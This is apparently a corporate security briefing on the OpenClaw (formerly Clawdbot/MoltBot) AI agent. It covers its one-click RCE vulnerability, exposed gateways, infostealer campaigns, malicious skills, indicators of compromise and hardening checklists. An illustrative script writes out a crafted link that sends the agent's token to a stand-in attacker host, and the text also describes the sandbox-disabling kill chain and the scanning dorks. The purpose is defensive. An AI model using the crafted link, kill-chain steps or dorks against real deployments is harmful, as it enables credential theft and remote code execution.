Classification: Public
Date: February 6, 2026
Distribution: Security Operations, IT Leadership, Executive Team, Endpoint Management
Prepared By: Tech Jacks Solutions Security Intelligence

1. Executive Summary
An open-source AI agent called Clawdbot (rebranded to MoltBot on January 27, then to OpenClaw on January 29-30, 2026) represents one of the most significant shadow AI risks to emerge in early 2026. The tool went from niche GitHub project to over 145,000 stars in under two weeks per CNBC reporting, with over 100,000 users granting it autonomous access to their operating systems, messaging platforms, credentials, and corporate services. Security researchers have identified critical vulnerabilities, led by CVE-2026-25253 (CVSS 8.8, one-click RCE), alongside thousands of exposed control panels leaking API keys and private messages, active infostealer campaigns targeting its plaintext credential storage, and malicious extensions impersonating the tool. Exposure estimates range from several thousand to over 21,000 publicly accessible instances depending on scanning tool and methodology, with Censys identifying 21,639 as of January 31, 2026. According to VentureBeat and Guardz reporting, commodity malware families (RedLine, Lumma, Vidar) added Clawdbot-specific credential harvesting modules before many security teams had identified the tool in their environments. Enterprise exposure is real: Noma Security confirmed Clawdbot instances running on corporate endpoints, and the tool can connect to Slack, Microsoft Teams, Gmail, and SharePoint with a single OAuth grant.
This briefing covers what Clawdbot/MoltBot is, how it works, its verified vulnerability profile, indicators of installation and compromise, and specific guidance for both enterprise blocking and safer personal use.

2. What Is Clawdbot / MoltBot / OpenClaw?
Clawdbot is a self-hosted, open-source AI personal assistant created by Austrian developer Peter Steinberger. It connects large language models (Claude, OpenAI, DeepSeek, and others including locally-run models) to messaging platforms and local system capabilities. Steinberger recommends Claude Opus 4.5 for optimal results, but the multi-model support widens the credential exposure surface since API keys for each connected model backend are stored locally. The tool runs as a persistent background service on the user’s device and accepts instructions through WhatsApp, Telegram, Slack, Discord, Signal, iMessage, Microsoft Teams, and other channels.
The naming history matters for detection. The project launched as Clawdbot with the agent name “Clawd.” Anthropic issued a trademark request over the similarity to “Claude,” prompting a rename to MoltBot (agent: “Molty”) on January 27. A second rename to OpenClaw followed on January 29-30 after Steinberger acknowledged the MoltBot name hadn’t resonated with the community. All three names remain active in the wild across different deployments, forks, and cached installations.
What separates this from a typical chatbot: Clawdbot doesn’t just answer questions. It executes. It reads and writes files, runs shell commands, browses the web, manages calendars, sends emails, and maintains persistent memory of prior interactions stretching back months. It does all of this autonomously, often without per-action user approval. Security researchers have mapped its attack surface against the OWASP Top 10 for Agentic Applications, finding alignment across categories (Palo Alto Networks’ analysis references the OWASP Agentic AI Survival Guide in its assessment).
The core architecture consists of two components. The Clawdbot Gateway (default port 18789) handles message routing, AI inference, credential management, and tool execution. The Control UI is a web-based admin panel for configuration, conversation inspection, and key management. Both become attack surfaces when deployed without hardening.
Sources:
- The Register – Clawdbot becomes Moltbot
- Palo Alto Networks – Why Moltbot May Signal the Next AI Security Crisis
- Vectra AI – From Clawdbot to OpenClaw
- CNBC – OpenClaw Rise and Controversy
- TechCrunch – OpenClaw’s AI Assistants
3. Critical Vulnerabilities
CVE-2026-25253: One-Click Remote Code Execution (CVSS 8.8)
The Control UI accepted a gatewayUrl parameter from the browser’s query string without validation. On page load, it auto-connected via WebSocket to the specified URL and transmitted the stored authentication token. An attacker hosting a malicious page could steal the token in milliseconds, establish a cross-site WebSocket connection back to the victim’s local instance (using the victim’s own browser to bypass localhost restrictions), disable sandboxing via the API, and execute arbitrary commands on the host.
The kill chain: the victim visits a crafted URL; on load the Control UI sends the stored token to the attacker's endpoint; the attacker uses that token to connect to the gateway as the victim; disables the sandbox (exec.approvals.set = off); escapes the Docker container (tools.exec.host = gateway); and achieves full RCE on the host machine.
Fix: Version 2026.1.29 (released January 30, 2026). Public PoC exploit code is available on GitHub (ethiack/moltbot-1click-rce).
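The bug above comes down to one decision the Control UI makes on page load: which WebSocket endpoint receives the stored token. The block below is an added illustration of that decision, not OpenClaw's own code; the function names, the way the stored token is modelled and the simulated socket are assumptions built from the public description of CVE-2026-25253, and the post-token steps (disabling approvals, moving exec onto the host) are deliberately out of scope.

```javascript
// Added illustration of the CVE-2026-25253 pattern; not OpenClaw's code.
// Both resolvers answer the question the Control UI answers on page load:
// which WebSocket endpoint gets the stored gateway token?

// Vulnerable: honour ?gatewayUrl= from the page's own query string.
// A link such as http://127.0.0.1:18789/?gatewayUrl=wss://attacker.example/ws
// makes the UI hand the token to the attacker as soon as it loads.
function resolveGatewayUrlVulnerable(pageUrl, defaultUrl) {
  const params = new URL(pageUrl).searchParams;
  return params.get('gatewayUrl') || defaultUrl;
}

// Hardened: the token only ever goes to an allowlisted origin (assumed here
// to be the loopback gateway). Page input may pick among allowed origins but
// can never introduce a new one; anything else aborts before a socket opens.
function resolveGatewayUrlHardened(pageUrl, allowedOrigins) {
  const requested = new URL(pageUrl).searchParams.get('gatewayUrl');
  if (requested === null) return allowedOrigins[0];
  let candidate;
  try {
    candidate = new URL(requested);
  } catch {
    throw new Error('gatewayUrl is not a valid URL; refusing to connect');
  }
  const isWs = candidate.protocol === 'ws:' || candidate.protocol === 'wss:';
  if (!isWs || !allowedOrigins.some((o) => sameOrigin(candidate, new URL(o)))) {
    throw new Error(`gatewayUrl origin ${candidate.protocol}//${candidate.host} is not allowlisted; refusing to connect`);
  }
  return candidate.toString();
}

// Origin comparison that treats ws://host and ws://host:80 as the same origin.
function sameOrigin(a, b) {
  const port = (u) => u.port || (u.protocol === 'wss:' ? '443' : '80');
  return a.protocol === b.protocol && a.hostname === b.hostname && port(a) === port(b);
}

// Simulated auto-connect. `openSocket` is injected so this runs offline;
// the real UI would call `new WebSocket(url)` here.
function autoConnect(resolver, pageUrl, token, openSocket) {
  const url = resolver(pageUrl);
  openSocket(url).send(JSON.stringify({ type: 'auth', token }));
  return url;
}

// Constructed inputs: a fake stored token and a crafted link of the kind an
// attacker would get the victim to click. None of these values are real.
const STORED_TOKEN = 'example-token-not-real';
const ALLOWED_ORIGINS = ['ws://127.0.0.1:18789', 'ws://localhost:18789'];
const CRAFTED_LINK = 'http://127.0.0.1:18789/?gatewayUrl=wss://attacker.example/ws';

// Records every message instead of sending it, so the leak is observable.
function recordingSocketFactory(log) {
  return (url) => ({ send: (message) => log.push({ url, message }) });
}

function demo() {
  const sent = [];
  const leakedTo = autoConnect(
    (p) => resolveGatewayUrlVulnerable(p, ALLOWED_ORIGINS[0]),
    CRAFTED_LINK, STORED_TOKEN, recordingSocketFactory(sent));
  let hardenedBlocked = false;
  try {
    autoConnect((p) => resolveGatewayUrlHardened(p, ALLOWED_ORIGINS),
      CRAFTED_LINK, STORED_TOKEN, recordingSocketFactory(sent));
  } catch (err) {
    hardenedBlocked = true;
  }
  // Only the vulnerable path ever transmitted the token, and it went off-host.
  return { leakedTo, hardenedBlocked, messagesSent: sent.length };
}

if (typeof require !== 'undefined' && require.main === module) console.log(demo());
```

The property worth keeping from the hardened version is that no page-controlled input can choose where a credential is sent; the upstream fix in 2026.1.29 may differ in mechanics, but any patch that still lets the query string name an arbitrary origin leaves the same class of bug in place.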
CVE-2026-25157: Command Injection
Tenable’s analysis identified additional command injection vulnerabilities in gateway components, including CVE-2026-25157, enabling attackers to execute arbitrary OS commands through crafted inputs. A researcher from depthfirst chained two separate findings (including CVE-2026-25253) to achieve code execution on the bot, and these command injection CVEs represent a related but distinct attack path through the gateway’s input handling.
Note: Detailed CVSS scoring, specific affected version ranges, and granular remediation guidance for CVE-2026-25157 remain limited in public reporting at time of publication. Organizations should monitor the NVD entry and Tenable’s plugin pipeline for updated scoring. The general remediation guidance (update to latest OpenClaw release, restrict gateway exposure) applies.
Unauthenticated Gateway Exposure (No CVE Assigned)
By default, the Clawdbot gateway binds to 0.0.0.0:18789, exposing its full API to any network interface. Connections originating from localhost are auto-authenticated without credentials. When users deploy behind reverse proxies (Nginx, Caddy) on the same server, the proxy forwards traffic as localhost, collapsing the authentication boundary entirely. External attackers gain full admin access without any exploit, just by navigating to the URL.
ClawdHub Supply Chain Risk
ClawdHub, the public skill registry, allows third-party skill installation with execution in the same operational context as the agent. Researcher Jamieson O’Reilly demonstrated the risk by uploading a benign-appearing skill, inflating its download count past 4,000, and reaching 16 developers in seven countries within eight hours. Koi Security identified hundreds of malicious skills in the registry.
Sources:
- The Hacker News – OpenClaw Bug Enables One-Click RCE
- depthfirst – 1-Click RCE to Steal Your Moltbot Data
- SOCRadar – CVE-2026-25253 Analysis
- Tenable – Clawdbot Agentic AI Security Vulnerabilities
4. Active Threat Landscape
Infostealer Targeting
Commodity malware-as-a-service families adapted faster than defenders. Guardz threat intelligence confirmed that RedLine, Lumma, and Vidar have deployed Clawdbot-specific modules targeting the ~/.clawdbot/ directory structure. Unlike browser password stores (encrypted with DPAPI on Windows, Keychain on macOS), Clawdbot stores credentials in plaintext JSON and Markdown files. No decryption needed. One file compromise yields multiple service tokens across platforms.
Hudson Rock characterized this as “Cognitive Context Theft,” noting that attackers don’t just steal credentials; they gain access to months of conversation history, planning context, behavioral patterns, and social graphs.
Crypto Scams and Handle Hijacking
When the project renamed from Clawdbot to MoltBot, crypto scammers seized the abandoned @clawdbot handles on X and GitHub within seconds. They promoted a fake $CLAWD token on Solana that hit a $16 million market cap before crashing to near zero. The hijacked handles reached the project’s 60,000+ followers.
Fake VS Code Extensions
Malicious “Clawdbot Agent” extensions were published on the VS Code marketplace, installing ScreenConnect-based remote access trojans on developer machines.
Exposed Instances at Scale
Hunt.io identified over 17,500 exposed instances across 52 countries. The United States leads with 35.6% of deployments (891 instances on Hunt.io’s scan; Censys counted 21,639 total). Straiker Labs confirmed successful exfiltration of API keys, service tokens, and WhatsApp session credentials from exposed instances during controlled testing. SOCRadar flagged 50+ newly registered domains containing the “clawd” keyword, a standard precursor to phishing campaigns.
Moltbook Platform Breach
Moltbook, the social network for AI agents, was discovered running on Supabase with Row Level Security disabled. The exposed API endpoint contained agent API keys, authentication tokens, and ownership mappings, allowing full impersonation of any registered AI agent.
Sources:
- VentureBeat – Infostealers Added Clawdbot to Target Lists
- Guardz – ClawdBot Security Failures and Active Campaigns
- Bitdefender – Moltbot Security Alert
- Adversa AI – OpenClaw Security Guide 2026
5. Enterprise Risk Assessment
Why This Matters for Organizations
Noma Security confirmed Clawdbot instances running across enterprise endpoints before security teams were aware of it. The tool connects to corporate services (Slack, Gmail, Microsoft Teams, SharePoint) via OAuth, and employees installing it on personal or work devices can inadvertently grant it access to corporate data. This is the “Shadow AI” problem in its purest form.
Heather Adkins, VP of Security Engineering at Google Cloud, publicly cautioned on social media against running the tool, stating “Don’t run Clawdbot” (citing a researcher who characterized it as “an infostealer malware disguised as an AI personal assistant”). Prompt Security CEO Itamar Golan (now leading AI security strategy at SentinelOne following their acquisition of Prompt Security) warned that agentic systems like Clawdbot “don’t just generate output. They observe, decide, and act continuously across email, files, calendars, browsers, and internal tools.”
Shruti Gandhi, general partner at Array VC, reported 7,922 attack attempts against her firm’s Clawdbot instance.
The tool fails what security researcher Simon Willison calls the “lethal trifecta” test: any agent with (1) private data access + (2) untrusted content exposure + (3) external communication capability = high risk. Clawdbot checks all three boxes by design.
Regulatory consideration: Under the EU AI Act and NIST AI RMF, running autonomous agents without governance, access controls, or risk management documentation may constitute non-compliance.
Sources:
- Noma Security – Clawdbot Agentic AI Risks
- Brandefense – Shadow AI Agent Gateways
- Straiker – Clawdbot Becomes a Backdoor
6. Indicators of Installation & Compromise
Filesystem Artifacts (Check Endpoints)
| Indicator | Path / Detail |
|---|---|
| Configuration directory | ~/.clawdbot/, ~/.moltbot/, ~/.openclaw/ |
| Main config file | clawdbot.json or moltbot.json (plaintext credentials) |
| Memory files | Markdown files in agent directory containing conversation history |
| Node.js processes | Long-running Node processes associated with gateway service |
| Default gateway port | TCP 18789 (WebSocket + HTTP multiplexed) |
| Control UI port | TCP 3000 (web-based admin panel) |
| mDNS broadcast | _openclaw-gw._tcp on port 5353 |
Network Indicators
| Indicator | Detail |
|---|---|
| Outbound WebSocket traffic | Persistent connections to port 18789 |
| Shodan/Censys HTML fingerprints | Page titles: “Clawdbot Control,” “Moltbot Control,” “OpenClaw Control” |
| TLS certificate fields | Self-signed certs with “Clawdbot,” “Moltbot,” or “OpenClaw” in organization name |
| Fofa dork | app="Moltbot" |
| Shodan dork | moltbot-gw |
| API endpoint (unauthenticated) | /api/export-auth (leaks stored tokens pre-patch) |
Malicious Infrastructure IOCs
| IOC Type | Detail |
|---|---|
| Fake VS Code extensions | “Clawdbot Agent” extensions installing ScreenConnect RATs |
| Domain squatting | 50+ domains registered with “clawd” keyword (SOCRadar) |
| Crypto scam handles | Former @clawdbot on X and GitHub promoting fake $CLAWD token |
| Malicious skills | Hundreds of backdoored skills on ClawdHub (Koi Security) |
7. Enterprise Blocking & Risk Reduction Checklist
Immediate Actions (Do This Week)
- [ ] Scan endpoints for ~/.clawdbot/, ~/.moltbot/, and ~/.openclaw/ directories using EDR or endpoint management tools
- [ ] Scan the network for WebSocket traffic to ports 18789 and 3000, and watch for mDNS advertisements of _openclaw-gw._tcp on UDP 5353
- [ ] Scan external IP ranges using Shodan queries for “Clawdbot Control,” “Moltbot Control,” or “OpenClaw Control” HTML fingerprints
- [ ] Block port 18789 at the perimeter firewall for inbound connections
- [ ] Block known malicious VS Code extensions named “Clawdbot Agent” via extension management policies
- [ ] Add Clawdbot/MoltBot/OpenClaw to your organization’s prohibited software list and endpoint application control policies
- [ ] Revoke OAuth tokens if any corporate service (Slack, Gmail, Microsoft Teams, SharePoint) shows Clawdbot/MoltBot/OpenClaw as an authorized integration
- [ ] Alert SOC analysts to watch for the filesystem and network indicators listed in Section 6
Policy & Governance
- [ ] Update acceptable use policy to explicitly prohibit AI agents with autonomous system access on corporate devices
- [ ] Classify AI agents as privileged infrastructure requiring the same security review as production servers
- [ ] Require security review before any AI agent is connected to corporate services via OAuth or API keys
- [ ] Brief development teams specifically: developer curiosity drives adoption, and this tool was marketed to developers first
- [ ] Map existing deployments against the OWASP Top 10 for Agentic Applications
Credential Rotation (If Installation Found)
- [ ] Rotate all API keys that were stored in Clawdbot configuration (Anthropic, OpenAI, Google AI, Slack, Telegram, etc.)
- [ ] Rotate OAuth tokens for any connected corporate services
- [ ] Invalidate WhatsApp/Signal/iMessage session credentials if messaging integrations were configured
- [ ] Review conversation history files for any leaked corporate data, internal documents, or credentials
- [ ] Scan the device for infostealer indicators (RedLine, Lumma, Vidar artifacts)
8. Personal Device Safety Guidance
For individuals who choose to run Clawdbot/OpenClaw on personal devices (not recommended for most users), the following hardening steps reduce (but do not eliminate) risk.
Before installation, ask yourself this: Would you give a stranger full access to your email, messages, files, and shell for the privilege of having them schedule your calendar? That’s the trust model.
If You Still Proceed
- Update to version 2026.1.29 or later to patch CVE-2026-25253 (one-click RCE). Running any earlier version means a single malicious link can compromise your machine.
- Bind the gateway to localhost only. Verify gateway.host is set to 127.0.0.1, not 0.0.0.0. This is the single most impactful configuration change.
- Set a strong gateway authentication password. Verify gateway.auth.password is configured and, if you use a reverse proxy, that it passes the authentication header through rather than relying on the localhost shortcut: a proxy on the same host forwards every client as localhost, which turns the auto-auth shortcut into an unauthenticated admin interface.
- Allowlist tools explicitly. Use the OpenClaw Security Guide’s allowlist mode to restrict which tools the agent can invoke. Block shell execution capabilities unless specifically needed.
- Scope API tokens narrowly. Every service token granted to the agent should have minimum required permissions. Don’t give it admin-level access to anything.
- Don’t connect corporate accounts. Period. Keep work email, work Slack, and any corporate services completely disconnected from personal Clawdbot instances.
- Don’t install skills from ClawdHub unless you’ve personally audited the source code. The marketplace has minimal vetting (a one-week-old GitHub account is sufficient to publish), and hundreds of malicious skills have been identified.
- Monitor network traffic. Install a local network monitoring tool (LuLu on macOS, or equivalent) to track outbound connections from the Clawdbot process.
- Run inside a container or VM. Docker with restricted capabilities reduces blast radius if the agent is compromised. Don’t run as root.
- Verify you’re downloading from the official repository. With 50+ squatted domains and hijacked social handles, fake install pages distributing trojanized versions are a confirmed threat.
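The configuration items in the list above can be checked mechanically. The block below is an added example, not OpenClaw's code: the paths gateway.host, gateway.auth.password and exec.approvals follow this briefing's wording, while tools.allowlist, the command-tool names and the 16-character minimum are assumptions to adapt to whatever the installed version actually writes. It audits a parsed config and returns findings, with the out-of-the-box shape from Section 3 beside a hardened one.

```javascript
// Added example for the personal hardening checklist; not OpenClaw's code.
// Key paths follow this briefing's wording; adjust them to your installed version.
const LOOPBACK_HOSTS = new Set(['127.0.0.1', '::1', 'localhost']);
const WILDCARD_BINDS = new Set(['0.0.0.0', '::', '']);
const COMMAND_TOOLS = new Set(['exec', 'shell', 'bash', 'terminal']); // assumed tool names
const MIN_PASSWORD_LENGTH = 16;                                        // local policy choice

// Read a dotted path such as "gateway.auth.password" from a plain object.
function getPath(obj, dotted) {
  return dotted.split('.').reduce((cur, key) => (cur == null ? undefined : cur[key]), obj);
}

// Returns a list of findings; an empty list means every check passed.
function auditConfig(cfg) {
  const findings = [];
  const flag = (severity, key, message) => findings.push({ severity, key, message });

  const host = getPath(cfg, 'gateway.host');
  if (host === undefined || WILDCARD_BINDS.has(host)) {
    flag('critical', 'gateway.host', 'gateway listens on all interfaces; set 127.0.0.1');
  } else if (!LOOPBACK_HOSTS.has(host)) {
    flag('high', 'gateway.host', `gateway bound to ${host}; loopback is the only safe bind for personal use`);
  }

  const password = getPath(cfg, 'gateway.auth.password');
  if (typeof password !== 'string' || password.length === 0) {
    flag('critical', 'gateway.auth.password', 'no gateway password; localhost auto-auth is the only barrier');
  } else if (password.length < MIN_PASSWORD_LENGTH) {
    flag('medium', 'gateway.auth.password', `password shorter than ${MIN_PASSWORD_LENGTH} characters`);
  }

  const allowlist = getPath(cfg, 'tools.allowlist');
  if (!Array.isArray(allowlist)) {
    flag('high', 'tools.allowlist', 'no tool allowlist; every tool, including shell execution, is callable');
  } else {
    for (const tool of allowlist) {
      if (COMMAND_TOOLS.has(tool)) flag('medium', 'tools.allowlist', `command tool "${tool}" allowed; remove it unless required`);
    }
  }

  const approvals = getPath(cfg, 'exec.approvals');
  if (approvals === 'off' || approvals === false) {
    flag('high', 'exec.approvals', 'per-action approval disabled; this is the setting the RCE chain turns off');
  }

  return findings;
}

// Process-level check for the "don't run as root" step (POSIX only).
function runningAsRoot() {
  return typeof process.getuid === 'function' && process.getuid() === 0;
}

// Constructed configs: the default shape described in Section 3 beside the
// hardened shape the list above asks for. The passphrase is not a real one.
const WEAK_CONFIG = {
  gateway: { host: '0.0.0.0', auth: {} },
  exec: { approvals: 'off' },
};
const HARDENED_CONFIG = {
  gateway: { host: '127.0.0.1', auth: { password: 'constructed-long-example-passphrase' } },
  tools: { allowlist: ['calendar', 'files.read'] },
  exec: { approvals: 'on' },
};

function demo() {
  return { weak: auditConfig(WEAK_CONFIG), hardened: auditConfig(HARDENED_CONFIG), root: runningAsRoot() };
}

if (typeof require !== 'undefined' && require.main === module) console.log(JSON.stringify(demo(), null, 2));
```

Run it against the parsed contents of your config file after every upgrade: a release that resets gateway.host or re-enables a command tool will show up as a new finding rather than as a surprise in the Shodan results.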
9. Framework Alignment
| Threat | CIS Controls v8 | NIST CSF 2.0 | ISO 27001:2022 | MITRE ATT&CK |
|---|---|---|---|---|
| Unauthorized AI agent installation | 2.1, 2.3 (Software Inventory, Unauthorized Software) | ID.AM-02, PR.PS-05 | A.8.1 (User Endpoint Devices) | T1204 (User Execution) |
| Plaintext credential storage | 3.11 (Encrypt Sensitive Data at Rest) | PR.DS-01 | A.8.24 (Use of Cryptography) | T1552.001 (Credentials In Files) |
| Exposed admin interface | 4.1 (Secure Configuration Process), 4.4 (Firewall on Servers) | PR.IR-01 | A.8.20 (Networks Security) | T1133 (External Remote Services) |
| Supply chain skills risk | 16.5 (Trusted Third-Party Software Components) | GV.SC-06 | A.8.30 (Outsourced Development) | T1195.002 (Compromise Software Supply Chain) |
| Infostealer targeting | 10.1, 10.7 (Malware Defenses) | DE.CM-09 | A.8.7 (Protection Against Malware) | T1005 (Data from Local System) |
| OAuth token abuse | 6.1, 6.2 (Access Granting and Revoking) | PR.AA-01 | A.5.18 (Access Rights) | T1528 (Steal Application Access Token) |
10. Authoritative Sources Used
Security Research Firms:
- Noma Security: Enterprise Clawdbot Risk Analysis
- Intruder: Clawdbot: When Easy AI Becomes a Security Nightmare
- SOCRadar: What Is Clawdbot and Is It Actually Safe?
- Guardz: ClawdBot Security Failures and Defense Playbook
- Hunt.io: Hunting OpenClaw Exposures
- Straiker Labs: Clawdbot/Moltbot Backdoor Analysis
- Adversa AI: OpenClaw Security Guide 2026
- depthfirst: 1-Click RCE CVE-2026-25253 Writeup
Vendor Security Analysis:
- Palo Alto Networks: Why Moltbot May Signal the Next AI Security Crisis
- Tenable: Clawdbot Agentic AI Security Vulnerabilities
- Vectra AI: From Clawdbot to OpenClaw
- Bitdefender: Moltbot Security Alert
- Brandefense: Shadow AI Agent Gateways
Security News:
- The Register: Clawdbot becomes Moltbot
- The Hacker News: OpenClaw One-Click RCE
- VentureBeat: Infostealers Target Clawdbot
- Security Boulevard: Critical Vulnerabilities and Hardening Steps
- CNBC: OpenClaw Open-Source AI Agent Rise and Controversy
- TechCrunch: OpenClaw’s AI Assistants
Document Version: 1.0 Last Updated: February 6, 2026 Prepared By: Tech Jacks Solutions Security Intelligence